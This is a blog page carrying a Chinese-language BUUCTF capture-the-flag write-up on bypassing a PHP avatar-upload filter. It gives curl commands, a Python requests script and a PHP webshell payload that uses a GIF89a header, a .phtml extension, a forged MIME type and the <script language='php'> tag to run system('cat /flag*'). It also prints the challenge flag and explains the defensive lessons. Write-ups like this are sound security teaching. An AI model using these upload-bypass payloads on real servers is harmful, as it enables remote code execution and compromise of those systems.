<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 8.1.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"zhaochoudecat.github.io","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"always","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"mac"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":true,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="BUUCTF - 文件上传绕过实战 (上传头像) - DeepSeek WriteUp题目信息 目标地址: http:&#x2F;&#x2F;2428bd85-3ba8-4e37-ae0c-da50b037dab7.node5.buuoj.cn:81&#x2F; Flag: flag{64baf9a6-fdcc-4338-805d-bea8f7ec68ba}  题目分析打开靶机，页面是一个”上传头像”(上传头像)的表单页面，提">
<meta property="og:type" content="article">
<meta property="og:title" content="BUUCTF - 文件上传绕过实战 (上传头像) - DeepSeek WriteUp">
<meta property="og:url" content="https://zhaochoudecat.github.io/2026/05/02/BUUCTF/WEB/6-upload-deepseek/index.html">
<meta property="og:site_name" content="zhaochoudecat">
<meta property="og:description" content="BUUCTF - 文件上传绕过实战 (上传头像) - DeepSeek WriteUp题目信息 目标地址: http:&#x2F;&#x2F;2428bd85-3ba8-4e37-ae0c-da50b037dab7.node5.buuoj.cn:81&#x2F; Flag: flag{64baf9a6-fdcc-4338-805d-bea8f7ec68ba}  题目分析打开靶机，页面是一个”上传头像”(上传头像)的表单页面，提">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2026-05-01T16:00:00.000Z">
<meta property="article:modified_time" content="2026-05-03T04:50:45.171Z">
<meta property="article:author" content="zhaochoudecat">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="web">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://zhaochoudecat.github.io/2026/05/02/BUUCTF/WEB/6-upload-deepseek/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>BUUCTF - 文件上传绕过实战 (上传头像) - DeepSeek WriteUp | zhaochoudecat</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">zhaochoudecat</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://zhaochoudecat.github.io/2026/05/02/BUUCTF/WEB/6-upload-deepseek/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/saber.jpg">
      <meta itemprop="name" content="zhaochoudecat">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zhaochoudecat">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          BUUCTF - 文件上传绕过实战 (上传头像) - DeepSeek WriteUp
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2026-05-02 00:00:00" itemprop="dateCreated datePublished" datetime="2026-05-02T00:00:00+08:00">2026-05-02</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2026-05-03 12:50:45" itemprop="dateModified" datetime="2026-05-03T12:50:45+08:00">2026-05-03</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/BUUCTF/" itemprop="url" rel="index"><span itemprop="name">BUUCTF</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/BUUCTF/WEB/" itemprop="url" rel="index"><span itemprop="name">WEB</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="BUUCTF-文件上传绕过实战-上传头像-DeepSeek-WriteUp"><a href="#BUUCTF-文件上传绕过实战-上传头像-DeepSeek-WriteUp" class="headerlink" title="BUUCTF - 文件上传绕过实战 (上传头像) - DeepSeek WriteUp"></a>BUUCTF - 文件上传绕过实战 (上传头像) - DeepSeek WriteUp</h1><h2 id="题目信息"><a href="#题目信息" class="headerlink" title="题目信息"></a>题目信息</h2><ul>
<li><strong>目标地址</strong>: <code>http://2428bd85-3ba8-4e37-ae0c-da50b037dab7.node5.buuoj.cn:81/</code></li>
<li><strong>Flag</strong>: <code>flag{64baf9a6-fdcc-4338-805d-bea8f7ec68ba}</code></li>
</ul>
<h2 id="题目分析"><a href="#题目分析" class="headerlink" title="题目分析"></a>题目分析</h2><p>打开靶机，页面是一个”上传头像”(上传头像)的表单页面，提交到 <code>upload_file.php</code>。</p>
<p>通过逐步测试（每一步都伴随具体的 curl 命令和返回结果），发现服务器对上传文件做了多重过滤。</p>
<hr>
<h3 id="测试-1：直接上传-PHP-文件-→-发现扩展名检测"><a href="#测试-1：直接上传-PHP-文件-→-发现扩展名检测" class="headerlink" title="测试 1：直接上传 PHP 文件 → 发现扩展名检测"></a>测试 1：直接上传 PHP 文件 → 发现扩展名检测</h3><p><strong>测试命令：</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> <span class="string">&#x27;&lt;?php system(&quot;id&quot;); ?&gt;&#x27;</span> &gt; /tmp/test.php</span><br><span class="line">curl -s -F <span class="string">&quot;file=@/tmp/test.php&quot;</span> -F <span class="string">&quot;submit=提交&quot;</span> \</span><br><span class="line">  <span class="string">&quot;http://2428bd85-3ba8-4e37-ae0c-da50b037dab7.node5.buuoj.cn:81/upload_file.php&quot;</span></span><br></pre></td></tr></table></figure>

<p><strong>返回结果：</strong> <code>Not image!</code></p>
<p>说明服务器在接收文件时首先检查了文件扩展名，只允许图片扩展名(gif&#x2F;jpg&#x2F;jpeg&#x2F;png)通过。</p>
<p>只显示body标签的内容</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -s -F <span class="string">&quot;file=@./tmp/test.php&quot;</span> -F <span class="string">&quot;submit=提交&quot;</span> http://2428bd85-3ba8-4e37-ae0c-da50b037dab7.node5.buuoj.cn:81/upload_file.php | sed -n <span class="string">&#x27;/&lt;body&gt;/,/&lt;\/body&gt;/p&#x27;</span> | sed -e <span class="string">&#x27;1d;$d;s/&lt;[^&gt;]*&gt;//g&#x27;</span> | <span class="built_in">tr</span> -d <span class="string">&#x27;[:space:]&#x27;</span></span><br></pre></td></tr></table></figure>



<hr>
<h3 id="测试-2：对比不同扩展名，定位第一道防线-→-发现-MIME-类型检测"><a href="#测试-2：对比不同扩展名，定位第一道防线-→-发现-MIME-类型检测" class="headerlink" title="测试 2：对比不同扩展名，定位第一道防线 → 发现 MIME 类型检测"></a>测试 2：对比不同扩展名，定位第一道防线 → 发现 MIME 类型检测</h3><p>先试 <code>.phtml</code>：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> <span class="string">&#x27;&lt;?php system(&quot;id&quot;); ?&gt;&#x27;</span> &gt; /tmp/test.phtml</span><br><span class="line">curl -s -F <span class="string">&quot;file=@/tmp/test.phtml&quot;</span> -F <span class="string">&quot;submit=提交&quot;</span> \</span><br><span class="line">  <span class="string">&quot;http://2428bd85-3ba8-4e37-ae0c-da50b037dab7.node5.buuoj.cn:81/upload_file.php&quot;</span></span><br></pre></td></tr></table></figure>

<p><strong>返回结果：</strong> <code>Not image!</code></p>
<p>再试 <code>.gif</code>：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> <span class="string">&#x27;&lt;?php system(&quot;id&quot;); ?&gt;&#x27;</span> &gt; /tmp/test.gif</span><br><span class="line">curl -s -F <span class="string">&quot;file=@/tmp/test.gif&quot;</span> -F <span class="string">&quot;submit=提交&quot;</span> \</span><br><span class="line">  <span class="string">&quot;http://2428bd85-3ba8-4e37-ae0c-da50b037dab7.node5.buuoj.cn:81/upload_file.php&quot;</span></span><br></pre></td></tr></table></figure>

<p><strong>返回结果：</strong> <code>NO! HACKER! your file included &#39;&lt;?&#39;</code></p>
<p>对比发现：</p>
<ul>
<li><code>.phtml</code> → <code>Not image!</code>（第一关都没过）</li>
<li><code>.gif</code> → <code>NO! HACKER!</code>（过了第一关，被第二关拦住）</li>
</ul>
<p>这说明第一道防线不止检查扩展名，还检查了 <code>$_FILES[&#39;file&#39;][&#39;type&#39;]</code>（MIME 类型）。<code>.gif</code> 的默认 MIME 是 <code>image/gif</code> 所以通过；<code>.phtml</code> 的默认 MIME 不是图片类型所以被拦。</p>
<hr>
<h3 id="测试-3：绕过-MIME-类型，触发内容检测-→-发现"><a href="#测试-3：绕过-MIME-类型，触发内容检测-→-发现" class="headerlink" title="测试 3：绕过 MIME 类型，触发内容检测 → 发现 &lt;? 过滤"></a>测试 3：绕过 MIME 类型，触发内容检测 → 发现 <code>&lt;?</code> 过滤</h3><p><strong>测试命令（<code>.phtml</code> + 显式 MIME 类型）：</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> <span class="string">&#x27;&lt;?php system(&quot;id&quot;); ?&gt;&#x27;</span> &gt; /tmp/test.phtml</span><br><span class="line">curl -s -F <span class="string">&quot;file=@/tmp/test.phtml;type=image/jpeg&quot;</span> -F <span class="string">&quot;submit=提交&quot;</span> \</span><br><span class="line">  <span class="string">&quot;http://2428bd85-3ba8-4e37-ae0c-da50b037dab7.node5.buuoj.cn:81/upload_file.php&quot;</span></span><br></pre></td></tr></table></figure>

<p><strong>返回结果：</strong> <code>NO! HACKER! your file included &#39;&lt;?&#39;</code></p>
<p>这次 <code>.phtml</code> + <code>type=image/jpeg</code> 通过了扩展名和 MIME 两道检查，进入了内容检测环节。服务器读取了文件内容，发现 <code>&lt;?</code> 字符串就拦截了。</p>
<p>结论：后端使用 <code>file_get_contents()</code> 或类似方式读取文件内容并检测 <code>&lt;?</code> 关键词。</p>
<hr>
<h3 id="测试-4：使用-绕过"><a href="#测试-4：使用-绕过" class="headerlink" title="测试 4：使用 &lt;script language=&quot;php&quot;&gt; 绕过 &lt;? 过滤 → 发现 Magic Bytes 检测"></a>测试 4：使用 <code>&lt;script language=&quot;php&quot;&gt;</code> 绕过 <code>&lt;?</code> 过滤 → 发现 Magic Bytes 检测</h3><p><strong>测试命令：</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> <span class="string">&#x27;&lt;script language=&quot;php&quot;&gt;system(&quot;id&quot;);&lt;/script&gt;&#x27;</span> &gt; /tmp/test.phtml</span><br><span class="line">curl -s -F <span class="string">&quot;file=@/tmp/test.phtml;type=image/jpeg&quot;</span> -F <span class="string">&quot;submit=提交&quot;</span> \</span><br><span class="line">  <span class="string">&quot;http://2428bd85-3ba8-4e37-ae0c-da50b037dab7.node5.buuoj.cn:81/upload_file.php&quot;</span></span><br></pre></td></tr></table></figure>

<p><strong>返回结果：</strong> <code>Don&#39;t lie to me, it&#39;s not image at all!!!</code></p>
<p>终于没有触发 <code>&lt;?</code> 过滤了，但出现了新的拦截。说明后端读取了文件头部字节来判断是否为有效图片格式（magic bytes 检测），当前文件没有合法的图片文件头所以被拒。</p>
<hr>
<h3 id="测试-5：最终绕过-—-GIF89a-phtml-MIME-script标签"><a href="#测试-5：最终绕过-—-GIF89a-phtml-MIME-script标签" class="headerlink" title="测试 5：最终绕过 — GIF89a + .phtml + MIME + script标签"></a>测试 5：最终绕过 — GIF89a + .phtml + MIME + script标签</h3><p><strong>测试命令：</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> <span class="string">&#x27;GIF89a &lt;script language=&quot;php&quot;&gt;system(&quot;cat /flag*&quot;);&lt;/script&gt;&#x27;</span> &gt; /tmp/shell.phtml</span><br><span class="line">curl -s -F <span class="string">&quot;file=@/tmp/shell.phtml;type=image/jpeg&quot;</span> -F <span class="string">&quot;submit=提交&quot;</span> \</span><br><span class="line">  <span class="string">&quot;http://2428bd85-3ba8-4e37-ae0c-da50b037dab7.node5.buuoj.cn:81/upload_file.php&quot;</span></span><br></pre></td></tr></table></figure>

<p><strong>返回结果：</strong> <code>上传文件名: shell.phtml</code></p>
<p>四道防线全部绕过，文件上传成功。</p>
<h3 id="额外步骤：定位上传目录"><a href="#额外步骤：定位上传目录" class="headerlink" title="额外步骤：定位上传目录"></a>额外步骤：定位上传目录</h3><p>上传成功后需要知道文件被存到了哪个路径。通过枚举常见上传目录来定位：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span> path <span class="keyword">in</span> <span class="string">&quot;test.gif&quot;</span> <span class="string">&quot;uploads/test.gif&quot;</span> <span class="string">&quot;upload/test.gif&quot;</span> <span class="string">&quot;images/test.gif&quot;</span>; <span class="keyword">do</span></span><br><span class="line">  code=$(curl -s -o /dev/null -w <span class="string">&quot;%&#123;http_code&#125;&quot;</span> <span class="string">&quot;http://2428bd85-3ba8-4e37-ae0c-da50b037dab7.node5.buuoj.cn:81/<span class="variable">$path</span>&quot;</span>)</span><br><span class="line">  <span class="built_in">echo</span> <span class="string">&quot;<span class="variable">$path</span> → HTTP <span class="variable">$code</span>&quot;</span></span><br><span class="line"><span class="keyword">done</span></span><br></pre></td></tr></table></figure>

<p>输出：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">test.gif → 404</span><br><span class="line">uploads/test.gif → 404</span><br><span class="line">upload/test.gif → 200</span><br><span class="line">images/test.gif → 404</span><br></pre></td></tr></table></figure>

<p>确认文件存储在 <code>/upload/</code> 目录下。</p>
<hr>
<h2 id="绕过条件汇总"><a href="#绕过条件汇总" class="headerlink" title="绕过条件汇总"></a>绕过条件汇总</h2><p>实际绕过需要同时满足 <strong>全部4项条件</strong>，缺一不可：</p>
<table>
<thead>
<tr>
<th>检测层</th>
<th>触发条件</th>
<th>错误提示</th>
<th>绕过方式</th>
</tr>
</thead>
<tbody><tr>
<td>扩展名</td>
<td>非图片扩展名(php&#x2F;php5&#x2F;phtml)</td>
<td><code>Not image!</code></td>
<td>使用 <code>.phtml</code> 扩展名</td>
</tr>
<tr>
<td>MIME 类型</td>
<td>未设置或非图片 MIME</td>
<td><code>Not image!</code></td>
<td>设置 <code>type=image/jpeg</code></td>
</tr>
<tr>
<td>内容 <code>&lt;?</code></td>
<td>文件内容包含 <code>&lt;?</code></td>
<td><code>NO! HACKER! your file included &#39;&lt;?&#39;</code></td>
<td>使用 <code>&lt;script language=&quot;php&quot;&gt;</code></td>
</tr>
<tr>
<td>Magic Bytes</td>
<td>文件头不是有效图片格式</td>
<td><code>Don&#39;t lie to me, it&#39;s not image at all!!!</code></td>
<td>文件头添加 <code>GIF89a</code></td>
</tr>
</tbody></table>
<p>所有检测均通过后，返回 <code>上传文件名: xxx.phtml</code>。</p>
<h2 id="Exploit-过程"><a href="#Exploit-过程" class="headerlink" title="Exploit 过程"></a>Exploit 过程</h2><h3 id="第一步：构造-Payload-并上传"><a href="#第一步：构造-Payload-并上传" class="headerlink" title="第一步：构造 Payload 并上传"></a>第一步：构造 Payload 并上传</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 构造包含命令执行的临时文件</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&#x27;GIF89a &lt;script language=&quot;php&quot;&gt;system(&quot;cat /flag*&quot;);&lt;/script&gt;&#x27;</span> &gt; /tmp/shell.phtml</span><br><span class="line"></span><br><span class="line"><span class="comment"># 上传文件，显式指定 MIME type 为 image/jpeg</span></span><br><span class="line">curl -s -F <span class="string">&quot;file=@/tmp/shell.phtml;type=image/jpeg&quot;</span> -F <span class="string">&quot;submit=提交&quot;</span> \</span><br><span class="line">  <span class="string">&quot;http://2428bd85-3ba8-4e37-ae0c-da50b037dab7.node5.buuoj.cn:81/upload_file.php&quot;</span></span><br></pre></td></tr></table></figure>

<p>上传成功返回：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">strong</span>&gt;</span>上传文件名: shell.phtml<span class="tag">&lt;<span class="name">br</span>&gt;</span><span class="tag">&lt;/<span class="name">strong</span>&gt;</span></span><br></pre></td></tr></table></figure>

<h3 id="第二步：访问-Webshell-获取-Flag"><a href="#第二步：访问-Webshell-获取-Flag" class="headerlink" title="第二步：访问 Webshell 获取 Flag"></a>第二步：访问 Webshell 获取 Flag</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -s http://2428bd85-3ba8-4e37-ae0c-da50b037dab7.node5.buuoj.cn:81/upload/shell.phtml</span><br></pre></td></tr></table></figure>

<p>返回结果：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GIF89a flag&#123;64baf9a6-fdcc-4338-805d-bea8f7ec68ba&#125;</span><br></pre></td></tr></table></figure>

<h2 id="Python-Exploit-版本"><a href="#Python-Exploit-版本" class="headerlink" title="Python Exploit 版本"></a>Python Exploit 版本</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://2428bd85-3ba8-4e37-ae0c-da50b037dab7.node5.buuoj.cn:81/upload_file.php&quot;</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;GIF89a &lt;script language=&quot;php&quot;&gt;system(&quot;cat /flag*&quot;);&lt;/script&gt;&#x27;</span></span><br><span class="line"></span><br><span class="line">files = &#123;</span><br><span class="line">    <span class="string">&quot;file&quot;</span>: (<span class="string">&quot;shell.phtml&quot;</span>, payload, <span class="string">&quot;image/jpeg&quot;</span>),</span><br><span class="line">    <span class="string">&quot;submit&quot;</span>: (<span class="literal">None</span>, <span class="string">&quot;提交&quot;</span>)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">resp = requests.post(url, files=files)</span><br><span class="line"><span class="built_in">print</span>(resp.text)</span><br></pre></td></tr></table></figure>

<h2 id="相关知识点总结"><a href="#相关知识点总结" class="headerlink" title="相关知识点总结"></a>相关知识点总结</h2><h3 id="1-MIME-校验的脆弱性"><a href="#1-MIME-校验的脆弱性" class="headerlink" title="1. MIME 校验的脆弱性"></a>1. MIME 校验的脆弱性</h3><p>PHP 中 <code>$_FILES[&#39;file&#39;][&#39;type&#39;]</code> 完全由客户端发送的 <code>Content-Type</code> 控制，无法作为安全校验依据。攻击者可随意修改。</p>
<h3 id="2-扩展名黑名单机制的缺陷"><a href="#2-扩展名黑名单机制的缺陷" class="headerlink" title="2. 扩展名黑名单机制的缺陷"></a>2. 扩展名黑名单机制的缺陷</h3><p>仅封禁常见的 <code>.php</code> 是不够的。攻击者可用以下扩展名绕过：</p>
<ul>
<li><code>.phtml</code> — Apache 中默认可解析为 PHP</li>
<li><code>.php5</code>、<code>.php7</code> — 取决于服务器配置</li>
<li><code>.pht</code> — 某些配置中可解析</li>
</ul>
<p>最佳实践：使用 <strong>白名单机制</strong>（仅允许 <code>.jpg</code>、<code>.png</code>、<code>.gif</code> 等）。</p>
<h3 id="3-PHP-其他标签语法"><a href="#3-PHP-其他标签语法" class="headerlink" title="3. PHP 其他标签语法"></a>3. PHP 其他标签语法</h3><p>PHP 支持多种标签形式，在 <code>&lt;?</code> 被过滤时可用于绕过：</p>
<table>
<thead>
<tr>
<th>标签形式</th>
<th>是否可用</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td><code>&lt;?php ?&gt;</code></td>
<td>被过滤</td>
<td>标准标签，含 <code>&lt;?</code></td>
</tr>
<tr>
<td><code>&lt;? ?&gt;</code></td>
<td>被过滤</td>
<td>短标签，含 <code>&lt;?</code></td>
</tr>
<tr>
<td><code>&lt;?= ?&gt;</code></td>
<td>被过滤</td>
<td>短输出标签，含 <code>&lt;?</code></td>
</tr>
<tr>
<td><code>&lt;script language=&quot;php&quot;&gt;</code></td>
<td><strong>可用</strong></td>
<td>已弃用，PHP 5.3 起弃用，PHP 7.0 移除</td>
</tr>
<tr>
<td><code>&lt;% %&gt;</code></td>
<td>不可用</td>
<td>ASP 风格标签，需 <code>asp_tags=On</code></td>
</tr>
</tbody></table>
<h3 id="4-Magic-Bytes-伪造"><a href="#4-Magic-Bytes-伪造" class="headerlink" title="4. Magic Bytes 伪造"></a>4. Magic Bytes 伪造</h3><p>PHP 的 <code>exif_imagetype()</code> &#x2F; <code>getimagesize()</code> 函数通过读取文件头的 magic bytes 判断文件类型。<br>常见图片文件头：</p>
<table>
<thead>
<tr>
<th>格式</th>
<th>Magic Bytes</th>
</tr>
</thead>
<tbody><tr>
<td>GIF</td>
<td><code>GIF89a</code> 或 <code>GIF87a</code></td>
</tr>
<tr>
<td>JPEG</td>
<td><code>\xFF\xD8\xFF</code></td>
</tr>
<tr>
<td>PNG</td>
<td><code>\x89PNG</code></td>
</tr>
</tbody></table>
<p>在最前面加上 <code>GIF89a</code> 即可绕过图像格式检测。</p>
<h3 id="5-Nginx-Apache-反向代理架构"><a href="#5-Nginx-Apache-反向代理架构" class="headerlink" title="5. Nginx + Apache 反向代理架构"></a>5. Nginx + Apache 反向代理架构</h3><p>本靶机架构为 OpenResty(Nginx) 反代后端 Apache：</p>
<ul>
<li>Nginx 直接处理静态文件请求（返回 <code>Server: openresty</code>）</li>
<li>PHP 动态请求转发给 Apache（返回 <code>Server: Apache/2.4.7 (Ubuntu)</code>）</li>
<li>404 页面由 Apache 返回，验证了后端是 Apache</li>
</ul>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><ul>
<li>PHP Manual: <a target="_blank" rel="noopener" href="https://www.php.net/manual/en/language.basic-syntax.phpmode.php">PHP tags</a></li>
<li>OWASP: <a target="_blank" rel="noopener" href="https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html">File Upload Cheat Sheet</a></li>
</ul>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CTF/" rel="tag"># CTF</a>
              <a href="/tags/web/" rel="tag"># web</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2026/05/02/BUUCTF/WEB/6-upload/" rel="prev" title="BUUCTF - 文件上传绕过实战 (上传头像)">
      <i class="fa fa-chevron-left"></i> BUUCTF - 文件上传绕过实战 (上传头像)
    </a></div>
      <div class="post-nav-item">
    <a href="/2026/05/02/BUUCTF/WEB/4-sql%E6%B3%A8%E5%85%A5-%E9%9A%8F%E4%BE%BF%E6%B3%A8/" rel="next" title="CTF SQL注入 - 随便注">
      CTF SQL注入 - 随便注 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
